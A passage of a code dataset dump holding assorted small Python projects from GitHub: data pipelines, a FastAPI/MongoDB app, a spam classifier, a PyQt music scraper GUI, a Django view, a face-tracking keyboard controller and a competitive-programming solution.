nfpdata.reset_index()\r\nfinnfpdata1 = finnfpdata.rename(columns={\"Value\": \"nfp\"})\r\nprint(finnfpdata1.head())\r\n\r\ndf8 = df7.merge(finnfpdata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/FRED/UNRATE-Civilian-Unemployment-Rate Unemployment Rate (UR)\r\nurdata = quandl.get(\"FRED/UNRATE\")\r\nfinurdata = 
urdata.reset_index()\r\nfinurdata1 = finurdata.rename(columns={\"Value\": \"ur\"})\r\nprint(finurdata1.head())\r\n\r\ndf9 = df8.merge(finurdata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/OECD/KEI_CSCICP02_USA_ST_M-Consumer-confidence-indicator-s-a-United-States-Level-ratio-or-index-Monthly (QUARTERLY) (CCI)\r\n#Consumer Confidence Index\r\nccidata = quandl.get(\"OECD/KEI_CSCICP02_USA_ST_M\")\r\nfinccidata = ccidata.rename(columns={\"Value\": \"cci\"})\r\nprint(finccidata.head())\r\n\r\ndffinal = df9.merge(finccidata,on='Date')\r\ndffinal.to_csv(\"FinalDataSet\", sep=\",\", header=True)","repo_name":"purvimisal/InterestRatePrediction","sub_path":"pipelining/data1.py","file_name":"data1.py","file_ext":"py","file_size_in_byte":7940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41096057523","text":"from sys import argv\r\nfrom util import convertDictToList,sortBySecond,convertListOfListToCsv\r\n\r\nplayers = open(argv[1]).read().split('\\n')\r\nscore_stats ={}\r\n\r\ndef incrementPlayerScore(player):\r\n if player not in score_stats:\r\n score_stats[player] = 0\r\n score_stats[player] += 1\r\n\r\nfor player1 in players:\r\n for player2 in players:\r\n if player1 < player2:\r\n rows = open('output/first_win_faceoff/first_win_faceoff_%s_%s.csv'%(player1,player2)).read().split('\\n')\r\n score_diff = 0\r\n for row in rows:\r\n if row == '':\r\n continue\r\n variant,num_players,attempts1,ignore1,attempts2,ignore2 = row.split(',')\r\n score_diff += (1.0/int(attempts1) - 1.0/int(attempts2))\r\n if score_diff > 0:\r\n incrementPlayerScore(player1)\r\n else:\r\n incrementPlayerScore(player2)\r\n\r\nscore_stats = convertDictToList(score_stats)\r\nscore_stats = sortBySecond(score_stats)\r\n\r\noutput = open('output/player_score_summary1.csv', 'w')\r\noutput.write(convertListOfListToCsv(score_stats))\r\noutput.close()","repo_name":"Lel0uch-H/hanab-stats","sub_path":"player_score_summary1.py","file_name":"player_score_summary1.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36634348108","text":"# -*- coding: utf-8 -*-\nfrom model.group import Group\nimport random\n\ndef test_delete_group(app):\n if app.group.count() == 0:\n app.group.create(Group(\"test\"))\n old_groups = app.group.get_group_list()\n index = random.randrange(len(old_groups))\n app.group.delete_random_group(index)\n new_groups = app.group.get_group_list()\n assert len(new_groups)+1 == len(old_groups)\n old_groups[index: index+1] = []\n assert old_groups == new_groups\n\n","repo_name":"agnieszkazm/python_for_tests","sub_path":"test/test_delete_group.py","file_name":"test_delete_group.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22050599354","text":"from typing import Union\nfrom fastapi import FastAPI\nfrom .routers import routers\nfrom dotenv import dotenv_values\nfrom pymongo import MongoClient\n\nconfig = dotenv_values(\".env\")\napp = FastAPI()\n\n@app.on_event(\"startup\")\ndef startup_db_client():\n app.mongodb_client = MongoClient(config[\"MONGODB_URI\"])\n app.database = app.mongodb_client[config[\"DB_NAME\"]]\n\n@app.on_event(\"shutdown\")\ndef shutdown_db_client():\n app.mongodb_client.close()\n\nfor router in routers:\n app.include_router(\n router=router['router'],\n prefix=router['prefix'],\n tags=router['tags']\n )\n\n# 
@app.get(\"/\")\n# def read_root():\n# return {\"Hello\": \"World\"}\n\n\n# @app.get(\"/items/{item_id}\")\n# def read_item(item_id: int, q: Union[str, None] = None):\n# return {\"item_id\": item_id, \"q\": q}\n","repo_name":"emran-jatri/wtn-fastapi","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28175384956","text":"import os\nfrom pymongo import MongoClient\nfrom datetime import datetime\n\n#===============================================\nclass MongoConnector:\n def __init__(self, data_path, host = None, port = None):\n self.mPath = data_path\n if host is None:\n host = \"localhost\"\n if port is None:\n port = 27017\n self.mMongo = MongoClient(host, port)\n self.mDSAgents = dict()\n self.mPlainAgents = dict()\n\n def close(self):\n self.mMongo.close()\n\n def getDSAgent(self, name, kind):\n if name not in self.mDSAgents:\n self.mDSAgents[name] = MongoDSAgent(self,\n self.mMongo[self.mPath][name], name)\n return self.mDSAgents[name]\n\n def getPlainAgent(self, name):\n if name not in self.mPlainAgents:\n self.mPlainAgents[name] = self.mMongo[self.mPath][name]\n return self.mPlainAgents[name]\n\n def getDB(self, db_path):\n return self.mMongo[db_path]\n\n#===============================================\nclass MongoDSAgent:\n def __init__(self, connector, agent, name):\n self.mConnector = connector\n self.mAgent = agent\n self.mName = name\n\n def getName(self):\n return self.mName\n\n def getAgentKind(self):\n assert False\n\n #===== CreationDate\n def getCreationDate(self):\n it = self.mAgent.find_one({\"_tp\": \"dsinfo\"})\n if it is not None:\n return it.get(\"upd-time\")\n return None\n\n def updateCreationDate(self, time_label = None, ajson_fname = None):\n to_update = {\"upd-time\": (time_label if time_label is not None\n else datetime.now().isoformat())}\n if ajson_fname is not None:\n ajson_stat = os.stat(ajson_fname)\n to_update[\"ajson-fstat\"] = [ajson_fname,\n int(ajson_stat.st_size), int(ajson_stat.st_mtime)]\n else:\n to_update[\"ajson-fstat\"] = None\n self.mAgent.update_one({\"_tp\": \"dsinfo\"}, {\"$set\": to_update},\n upsert = True)\n\n #===== Note\n def getNote(self):\n it = self.mAgent.find_one({\"_tp\": \"dsinfo\"})\n if it is not None:\n return (it.get(\"note\", \"\").strip(), it.get(\"note-time\"))\n return (\"\", None)\n\n def setNote(self, note):\n time_label = datetime.now().isoformat()\n self.mAgent.update_one({\"_tp\": \"dsinfo\"},\n {\"$set\": {\"note\": note.strip(), \"note-time\": time_label}},\n upsert = True)\n","repo_name":"ForomePlatform/anfisa","sub_path":"app/model/mongo_db.py","file_name":"mongo_db.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"9428949717","text":"import streamlit as st\r\nimport pickle\r\nimport string\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\ntfidf = pickle.load(open('vectorizer.pkl', 'rb'))\r\nmodel = pickle.load(open('model_bnb.pkl', 'rb'))\r\n\r\ndef transform_text(text):\r\n text_lower = text.lower()\r\n text_lower_token = nltk.word_tokenize(text_lower)\r\n text_final = []\r\n\r\n for i in text_lower_token:\r\n if i.isalnum():\r\n text_final.append(i)\r\n\r\n text_all = text_final[:]\r\n text_final.clear()\r\n\r\n for i in text_all:\r\n if i not in stopwords.words('english') and i not in string.punctuation:\r\n 
text_final.append(i)\r\n\r\n text_new = text_final[:]\r\n text_final.clear()\r\n\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n lemmatized_words = [lemmatizer.lemmatize(word) for word in text_new]\r\n\r\n return \" \".join(lemmatized_words)\r\n\r\nst.title('SMS Spam Classifier')\r\n\r\ninput_sms = st.text_area('Enter a message: ')\r\n\r\nif st.button('Predict'):\r\n\r\n\r\n # Steps\r\n # 1. Preprocess\r\n transformed_sms = transform_text(input_sms)\r\n # 2. vectorize\r\n\r\n vector_input = tfidf.transform([transformed_sms])\r\n # 3. predict\r\n\r\n result = model.predict(vector_input)[0]\r\n\r\n # 4. display result\r\n\r\n if result == 1:\r\n st.header(\"Spam\")\r\n else:\r\n st.header(\"Not Spam\")\r\n","repo_name":"Satyam24/SMS-Spam-Classifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23862502487","text":"import numpy as np\n\n\ndef plot_data_distribution(df, title_col=None):\n import seaborn as sns\n import matplotlib.pyplot as plt\n\n df['doc_len'] = df[title_col].apply(lambda words: len(words.split()))\n max_seq_len = np.round(df['doc_len'].mean() + df['doc_len'].std()).astype(int)\n sns.distplot(df['doc_len'], hist=True, kde=True, color='b', label='doc len')\n plt.axvline(x=max_seq_len, color='k', linestyle='--', label='max len')\n plt.title('plot length')\n plt.legend()\n plt.show()\n\n\ndef fetch_course_info(dataframe_idx, df, title_col=None, desc_col=None):\n info = df.iloc[dataframe_idx]\n meta_dict = {title_col: info[title_col], desc_col: info[desc_col]}\n return meta_dict\n\n\ndef run_query_tests(model, desc_col=None, title_col=None):\n print(\"Running query tests\")\n query_test('Python Entwicklung', model, desc_col=desc_col, title_col=title_col)\n query_test('DevOps Azure CI/CD', model, desc_col=desc_col, title_col=title_col)\n\n\ndef query_test(query, model, desc_col=None, title_col=None):\n results = model.search(query, top_k=5, desc_col=desc_col, title_col=title_col)\n\n print(\"\\n\")\n for result in results:\n print('\\t', result)\n","repo_name":"amrohendawi/roberta-t5-faiss-semantic-search","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"3499016882","text":"# -*- coding: UTF-8 -*-\n\nimport datetime\nimport multiprocessing\nimport sys\nimport os\nimport threading\nimport time\n\nimport src.ui.ui\nimport PyQt5\nimport src.lyric_by_music\nimport src.music_by_songsall\nimport src.word_cloud_by_artist\nimport src.word_cloud_by_lyric\nimport src.searchLyric\n#\n#\n# if hasattr(sys, 'frozen'):\n#\n# os.environ['PATH'] = sys._MEIPASS + \";\" + os.environ['PATH']\n\nfrom src.ui.ui import Ui_MainWindow\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QHeaderView, QAbstractItemView, QTableWidgetItem\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5.QtCore import QEventLoop, QTimer, Qt\nfrom PyQt5.QtGui import QIcon, QPixmap, QCursor\n\nimport src.sql_sqlite as sql\nfrom src.lyric_by_music import lyricSpider\nfrom src.music_by_songsall import musicSpider\nfrom src.playlist_by_user import playlistSpider\nfrom src.word_cloud_by_artist import cloudArtist\nfrom src.word_cloud_by_lyric import cloudLyric\nfrom src.searchLyric import searchLyr\n\n\n# pyuic5 -o ui.py frame2.ui\n# pyrcc5 -o icon_rc.py icon.qrc\n# import src.ui.icon_rc\n\nclass EmittingStr(QtCore.QObject):\n # 定义一个发送str的信号\n 
textWritten = QtCore.pyqtSignal(str)\n\n    def write(self, text):\n        self.textWritten.emit(str(text))\n        loop = QEventLoop()\n        QTimer.singleShot(100, loop.quit)\n        loop.exec_()\n\n\nclass MyMainForm(QMainWindow, Ui_MainWindow):\n    def __init__(self, parent=None):\n        super(MyMainForm, self).__init__(parent)\n        # Remove the window frame\n        self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n        # Make the window transparent\n        self.setAttribute(Qt.WA_TranslucentBackground)\n        self.setupUi(self)\n        self.setWindowTitle('163MusicSA')\n        self.setWindowIcon(QIcon(r'./data/icon/icon.png'))\n        # QApplication.setStyle('Fusion')\n        # Fusion window style\n        self.th = None\n\n        self.musicSpider_Button.clicked.connect(self.musicSpider)\n        self.lyricSpider_Button.clicked.connect(self.lyricSpider)\n\n        self.cloudLyric_Button.clicked.connect(self.cloudLyric)\n        self.cloudArtist_Button.clicked.connect(self.cloudArtist)\n        self.shapeFile()\n        self.fontFile()\n        self.file_Button.clicked.connect(self.open_file)\n        self.shapefile_Button.clicked.connect(self.open_Shapefile)\n        self.fontfile_Button.clicked.connect(self.open_Fontfile)\n        self.min_Button.clicked.connect(self.showMinimized)\n        self.close_Button.clicked.connect(self.close)\n        self.meButton.clicked.connect(self.meBtn)\n\n        self.music_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n        self.music_table.horizontalHeader().setSectionResizeMode(0, QHeaderView.Interactive)\n        # self.music_table.setEditTriggers(QAbstractItemView.NoEditTriggers)\n        self.music_table.setColumnCount(3)\n        self.tableinf_Button.clicked.connect(self.getinf)\n\n        self.music_table_2.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n        self.music_table_2.horizontalHeader().setSectionResizeMode(0, QHeaderView.Interactive)\n        # self.music_table_2.setEditTriggers(QAbstractItemView.NoEditTriggers)\n        self.music_table_2.setColumnCount(2)\n        self.tableinf_Button_2.clicked.connect(self.getinf_2)\n\n        self.search_lyric.clicked.connect(self.searchlyr)\n\n        self.clear_Button.clicked.connect(self.clear)\n        self.clear_Button_2.clicked.connect(self.clear2)\n        self.clear_Button_3.clicked.connect(self.clear3)\n\n        sys.stdout = EmittingStr(textWritten=self.outputWritten)\n        sys.stderr = EmittingStr(textWritten=self.outputWritten)\n\n    # Allow dragging the window from anywhere\n    def mousePressEvent(self, QMouseEvent):\n        if QMouseEvent.button() == Qt.LeftButton:\n            self.flag = True\n            # Get the mouse position relative to the window\n            self.m_Position = QMouseEvent.globalPos() - self.pos()\n            QMouseEvent.accept()\n            # Change the mouse cursor icon\n            # self.setCursor(QCursor(Qt.OpenHandCursor))\n\n    def mouseMoveEvent(self, QMouseEvent):\n        if Qt.LeftButton and self.flag:\n            # Move the window\n            self.move(QMouseEvent.globalPos() - self.m_Position)\n            QMouseEvent.accept()\n\n    def mouseReleaseEvent(self, QMouseEvent):\n        self.flag = False\n        self.setCursor(QCursor(Qt.ArrowCursor))\n\n    def outputWritten(self, text):\n        cursor = self.textBrowser.textCursor()\n        cursor.movePosition(QtGui.QTextCursor.End)\n        cursor.insertText(text)\n        self.textBrowser.setTextCursor(cursor)\n        self.textBrowser.ensureCursorVisible()\n\n    def musicSpider(self):\n        self.th = threading.Thread(target=self.ms)\n        # Make the thread a daemon so it does not keep running after the main thread exits\n        self.th.setDaemon(True)\n        # Start the new thread\n        self.th.start()\n\n    def ms(self):\n        musicSpider(self.user_idEdit.text())\n\n    def lyricSpider(self):\n        self.th = threading.Thread(target=self.ls)\n        # Make the thread a daemon so it does not keep running after the main thread exits\n        self.th.setDaemon(True)\n        # Start the new thread\n        self.th.start()\n\n    def ls(self):\n        lyricSpider(self.user_idEdit.text())\n\n\n    def cloudLyric(self):\n        self.th = threading.Thread(target=self.lc)\n        # Make the thread a daemon so it does not keep running after the main thread exits\n        self.th.setDaemon(True)\n        # Start the new thread\n        self.th.start()\n        # Read the user input from the line edit widget via its text() method\n\n    def lc(self):\n        cloudLyric(self.user_idEdit.text(), self.shapeBox.currentText(), self.fontBox.currentText())\n        pix = QPixmap(r'./data/wordcloud/' + self.user_idEdit.text() + '_lyricCloud.png')\n        self.cloud_label.setPixmap(pix)\n        # Scale the image to fit the QLabel\n        self.cloud_label.setScaledContents(True)\n\n    def cloudArtist(self):\n        self.th = threading.Thread(target=self.ca)\n        # Make the thread a daemon so it does not keep running after the main thread exits\n        self.th.setDaemon(True)\n        # Start the new thread\n        self.th.start()\n\n    def ca(self):\n        cloudArtist(self.user_idEdit.text(), self.shapeBox.currentText(), self.fontBox.currentText())\n        pix = QPixmap(r'./data/wordcloud/' + self.user_idEdit.text() + '_artistCloud.png')\n        self.cloud_label.setPixmap(pix)\n        # Scale the image to fit the QLabel\n        self.cloud_label.setScaledContents(True)\n\n    def shapeFile(self):\n        Shapelist = os.listdir(r\"./data/wordcloud/shape\")\n        for item in Shapelist:\n            self.shapeBox.addItem(item)\n\n    def fontFile(self):\n        Fontlist = os.listdir(r\"./data/wordcloud/font\")\n        for item in Fontlist:\n            self.fontBox.addItem(item)\n\n    def open_file(self): # open the folder\n        # f'{os.getcwd()}\\data\\wordcloud'\n        os.startfile(r'.\\data\\wordcloud')\n\n    def open_Shapefile(self): # open the folder\n        # f'{os.getcwd()}\\data\\wordcloud'\n        os.startfile(r'.\\data\\wordcloud\\shape')\n\n    def open_Fontfile(self): # open the folder\n        # f'{os.getcwd()}\\data\\wordcloud'\n        os.startfile(r'.\\data\\wordcloud\\font')\n\n\n    def getinf(self):\n        self.th = threading.Thread(target=self.gi)\n        # Make the thread a daemon so it does not keep running after the main thread exits\n        self.th.setDaemon(True)\n        # Start the new thread\n        self.th.start()\n\n    def getinf_2(self):\n        self.th = threading.Thread(target=self.gi2)\n        # Make the thread a daemon so it does not keep running after the main thread exits\n        self.th.setDaemon(True)\n        # Start the new thread\n        self.th.start()\n\n    def gi(self):\n        i = 0\n        if self.user_idEdit.text() == \"\" and self.music_table.rowCount() == 0:\n            inf = sql.get_musics()\n            self.music_table.insertColumn(0)\n            self.music_table.setHorizontalHeaderLabels(['用户id', '歌曲id', '歌曲名', '歌手'])\n            for item in inf:\n                self.music_table.insertRow(i)\n                self.music_table.setItem(i, 0, QTableWidgetItem(str(item['user_id'])))\n                self.music_table.setItem(i, 1, QTableWidgetItem(str(item['music_id'])))\n                self.music_table.setItem(i, 2, QTableWidgetItem(str(item['music_name'])))\n                self.music_table.setItem(i, 3, QTableWidgetItem(str(item['nickname'])))\n                i += 1\n            self.music_table.update()\n        else:\n            self.clear()\n            inf = sql.get_music_table(self.user_idEdit.text())\n            for item in inf:\n                self.music_table.insertRow(i)\n                self.music_table.setItem(i, 0, QTableWidgetItem(str(item['music_id'])))\n                self.music_table.setItem(i, 1, QTableWidgetItem(str(item['music_name'])))\n                self.music_table.setItem(i, 2, QTableWidgetItem(str(item['nickname'])))\n                i += 1\n            self.music_table.update()\n\n    def gi2(self):\n        i = 0\n        if self.user_idEdit.text() == \"\" and self.music_table_2.rowCount() == 0:\n            inf = sql.get_lyrics()\n            for item in inf:\n                self.music_table_2.insertRow(i)\n                self.music_table_2.setItem(i, 0, QTableWidgetItem(str(item['music_id'])))\n                self.music_table_2.setItem(i, 1, QTableWidgetItem(str(item['lyric'])))\n                i += 1\n            self.music_table_2.update()\n        else:\n            self.clear2()\n            inf = sql.get_lyric_table(self.user_idEdit.text())\n            for item in inf:\n                self.music_table_2.insertRow(i)\n                self.music_table_2.setItem(i, 0, QTableWidgetItem(str(item['music_id'])))\n                self.music_table_2.setItem(i, 1, QTableWidgetItem(str(item['lyric'])))\n                i += 1\n            self.music_table_2.update()\n\n    def searchlyr(self):\n        if self.music_idEdit.text() != \"\":\n            text = searchLyr(self.music_idEdit.text())\n            cursor = self.lyric_Browser.textCursor()\n            cursor.movePosition(QtGui.QTextCursor.End)\n            cursor.insertText(text)\n            self.lyric_Browser.setTextCursor(cursor)\n            self.lyric_Browser.ensureCursorVisible()\n\n    def clear(self):\n        count = self.music_table.rowCount()\n        if self.music_table.columnCount() == 4:\n            self.music_table.removeColumn(0)\n        for _ in range(count):\n            self.music_table.removeRow(0)\n\n    def clear2(self):\n        count = self.music_table_2.rowCount()\n        for _ in range(count):\n            self.music_table_2.removeRow(0)\n\n    def clear3(self):\n        self.music_idEdit.setText('')\n        self.lyric_Browser.setText('')\n\n    def meBtn(self):\n        QtGui.QDesktopServices.openUrl(QtCore.QUrl('https://github.com/Olvi73'))\n\n\n\n\n# Save log output to a file\nclass Logger(object):\n    def __init__(self, filename=\"./Default.log\"):\n        self.terminal = sys.stdout\n        self.log = open(filename, \"a\")\n\n    def write(self, message):\n        self.terminal.write(message)\n        self.log.write(message)\n\n    def flush(self):\n        pass\n\n\nif __name__ == '__main__':\n    # Required for multiprocessing when packaged as an executable\n    multiprocessing.freeze_support()\n    path = os.path.abspath(os.path.dirname(__file__))\n\n    # Boilerplate: every PyQt5 program needs a QApplication object. sys.argv is the command-line argument list, which allows the program to be started by double-clicking\n    app = QApplication(sys.argv)\n    # Initialize the main window\n    myWin = MyMainForm()\n    # Show the window on the screen\n    myWin.show()\n\n    sys.stdout = Logger('./log.txt')\n\n    # Clear the database\n    # sql.truncate_all()\n    # print(\"Database cleared\")\n\n    # Run the app; sys.exit ensures a clean exit.\n    sys.exit(app.exec_())\n","repo_name":"Olvi73/163MusicSA_PE","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11683,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"37175831751","text":"from django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom customer.models import Order\nfrom customer.serializers import OrderWithProductListSerializer\nfrom customer.utils import paginator_imitation\n\n\n@api_view([\"GET\"])\n@permission_classes([IsAuthenticated])\ndef admin__get_orders(request):\n    \"\"\"\n    Returns a paginated list of orders for the admin page.\n\n    GET parameters:\n    state:\n        accepted -> orders with state \"Accepted\"\n        completed -> orders with state \"Completed\"\n        canceled -> orders with state \"Canceled\"\n        any -> all orders\n\n    ordering: \"asc\" or \"desc\" - order by created_date\n    page: page number in the order paginator\n    per_page: number of orders per page in the order paginator\n\n    Available only for customers with admin permission.\n    \"\"\"\n    if not request.user.customer.admin_permission:\n        return Response({\"error\": f\"Not enough rights.\"}, status=403)\n\n    ordering = request.GET.get(\"ordering\", \"desc\")\n    state = request.GET.get(\"state\", \"Any\")\n\n    try:\n        filter_query = {\n            \"Accepted\": Q(state=\"Accepted\"),\n            \"Completed\": Q(state=\"Completed\"),\n            \"Canceled\": Q(state=\"Canceled\"),\n            \"Any\": Q(),\n        }[state]\n    except KeyError:\n        return Response({\n            \"error\": \"Invalid order-state GET parameter. 
\"\n \"it can only take the values: \"\n \"Accepted, Completed, Cancelled or Any.\"\n }, status=400)\n else:\n result = paginator_imitation(\n Order.objects\n .filter(filter_query)\n .order_by(f\"{'-' if ordering == 'desc' else ''}created_date\"),\n request.GET.get(\"page\", 1), request.GET.get(\"per-page\", 10)\n )\n\n return Response(OrderWithProductListSerializer(\n result, many=True\n ).data)\n","repo_name":"DevCrusader/UStoreAPI","sub_path":"project/customer/views/admin__get_orders.py","file_name":"admin__get_orders.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72222889535","text":"import json\nimport requests\nimport xmltodict\n\ndef lambda_handler(event, context):\n # print('event: ', event)\n rss_url = get_rss_url(event)\n feed = requests.get(rss_url)\n parsed = xmltodict.parse(feed.text)\n rss_as_json = json.dumps(parsed)\n response = {\n 'headers': headers(),\n 'body': rss_as_json,\n 'statusCode': 200\n }\n return response\n\ndef get_rss_url(event):\n query_params = event['queryStringParameters']\n print('queryStringParameters: ', query_params)\n rss_url = query_params['rss_url']\n return rss_url\n\ndef headers():\n return {\n 'Access-Control-Allow-Origin' : '*', # Required for CORS support to work\n }\n\n# with open('result.json', 'w') as f:\n# print(result, file=f) # Python 3.x\n","repo_name":"dsanch3z/podcastr-api","sub_path":"podcastr.py","file_name":"podcastr.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21022927819","text":"import requests\nimport bs4\nfrom datetime import date,datetime\n\ni=0\n\nsite=requests.get(\"http://datak.ir/mydatak/service_profile?detail_id=profile.show&oid=81336487\")\nsoup=bs4.BeautifulSoup(site.content.decode(\"UTF-8\"), 'html.parser')\nfor link in soup.findAll(\"span\"):\n if(i==1): \n v= float(link.string)\n i=0\n if(link.string==\"صفحه اصلی\"):\n i=1\n \nf_date = date(2020, 6, 6)\nl_date = datetime.now().date()\nd = (l_date - f_date).days\n\nprint(\"حجم:\",v)\nprint(\"زمان گذشته:\",d)\nif((100-v)/d>3.33):\n print(\"ریحانه داره اینترنتو میخوره\")\nelse:\n print(\"وضع خوبه\")","repo_name":"ahjafar/datak","sub_path":"datak.py","file_name":"datak.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8469639228","text":"from pynput.keyboard import Key, Controller\nimport numpy as np \nimport cv2\n\n#######################\n### SETUP CONSTANTS ###\n#######################\n\n# Thresholds before sensing inputs\nx_threshold = 50\ny_threshold = 50\n\n# The keys to press\nkey_x_below_threshold = Key.right # x < x_threshold\nkey_x_above_threshold = Key.left # x > x_threshold\nkey_y_below_threshold = Key.down # y < y_threshold\nkey_y_above_threshold = Key.up # y > y_threshold\n\n############################\n### FUNCTION DEFINITIONS ###\n############################\n\n# Converts screen coordinates to cartesian coordinates\ndef cartesian_coordinates(sx, sy, fw, fh):\n cx = sx - (fw/2)\n cy = (fh/2) - sy\n return (cx, cy)\n\n# Gets the midpoint of a box\ndef middle_of_box (x,y,w,h):\n mx = x + (w/2)\n my = y + (h/2)\n return mx, my\n\n########################\n### MAIN CODE MODULE ###\n########################\n\ndef main():\n wait_for_inputs = False\n\n # Keyboard Controller for inputs\n keyboard = Controller()\n\n # Haar Cascade for face 
detection\n    face_cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_alt2.xml\")\n\n    # The webcam capture\n    cap = cv2.VideoCapture(0)\n    f_width = cap.get(3)\n    f_height = cap.get(4)\n\n    while(True):\n\n        ret, frame = cap.read()\n\n        # Detect the faces\n        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n        faces = face_cascade.detectMultiScale(gray, scaleFactor=1.5, minNeighbors=5)\n\n        for (x,y,w,h) in faces:\n            # Convert to cartesian\n            mx, my = middle_of_box(x,y,w,h)\n            cx, cy = cartesian_coordinates(mx,my,f_width,f_height)\n            print(cx, cy)\n            \n            # Control the inputs based on the position of the face\n            if (wait_for_inputs):\n                if (cx < -x_threshold):\n                    keyboard.press(key_x_below_threshold)\n                elif (cx > x_threshold):\n                    keyboard.press(key_x_above_threshold)\n                if (cy < -y_threshold):\n                    keyboard.press(key_y_below_threshold)\n                elif (cy > y_threshold):\n                    keyboard.press(key_y_above_threshold)\n\n            # Draw a rectangle at the face\n            rect_color = (255,0,0)\n            stroke = 2\n            end_x = x + w\n            end_y = y + h\n            cv2.rectangle(frame, (x,y), (end_x,end_y), rect_color, stroke)\n\n        # The web cam frame\n        cv2.imshow('WebCam',frame)\n        # Read the keyboard once per frame; calling waitKey twice can drop key events\n        key = cv2.waitKey(1) & 0xFF\n        if key == ord('i'):\n            wait_for_inputs = True\n        if key == ord('q'):\n            break\n\n    # When done, exit cleanly\n    cap.release()\n    cv2.destroyAllWindows()\n    \nif __name__ == \"__main__\":\n    main()","repo_name":"alfi-s/face_controller","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"18571148843","text":"import math\n\n\ndef solve(n, q, a_list, lr_list):\n    m = max(a_list)\n    adds = [0] * (n + 1)\n    for i in range(3, n + 1):\n        adds[i] = (i * (i - 1) * (i - 2)) // 6\n    # print(adds)\n    # mo's algorithm\n    sort_list = []\n    for i, (l, r) in enumerate(lr_list):\n        d = int(math.sqrt(l))\n        sort_list.append((l - 1, r - 1, d, i))\n    sort_list = sorted(sort_list, key=lambda x: (x[2], x[1]))\n    # print(sort_list)\n    counter = [0] * (m + 1)\n    for a in a_list:\n        counter[a] += 1\n    adds_list = [0] * (m + 1)\n    for i in range(m + 1):\n        adds_list[i] = adds[counter[i]]\n    res = sum(adds_list)\n    left = 0\n    right = n - 1\n    res_list = [0] * q\n    # print(counter)\n    for l, r, _, i in sort_list:\n        # print(l, r, left, right)\n        while left < l:\n            a = a_list[left]\n            counter[a] -= 1\n            res -= adds[counter[a] + 1] - adds[counter[a]]\n            left += 1\n        while left > l:\n            a = a_list[left - 1]\n            counter[a] += 1\n            res += adds[counter[a]] - adds[counter[a] - 1]\n            left -= 1\n        while right > r:\n            a = a_list[right]\n            counter[a] -= 1\n            res -= adds[counter[a] + 1] - adds[counter[a]]\n            right -= 1\n        while right < r:\n            a = a_list[right + 1]\n            counter[a] += 1\n            res += adds[counter[a]] - adds[counter[a] - 1]\n            right += 1\n        res_list[i] = res\n    # print(counter)\n    # print(res)\n    # print(res_list)\n    return res_list\n\n\ndef main():\n    n, q = map(int, input().split())\n    a_list = list(map(int, input().split()))\n    lr_list = [tuple(map(int, input().split())) for _ in range(q)]\n    res = solve(n, q, a_list, lr_list)\n    for r in res:\n        print(r)\n\n\ndef test():\n    assert solve(10, 4, [2, 7, 1, 8, 2, 8, 1, 8, 2, 8], [(1, 10), (1, 9), (2, 10), (5, 5)]) == [5, 2, 4, 0]\n\n\nif __name__ == \"__main__\":\n    test()\n    main()\n","repo_name":"k-harada/AtCoder","sub_path":"ABC/ABC251-300/ABC293/G.py","file_name":"G.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"}{"seq_id":"11965194693","text":"from dash 
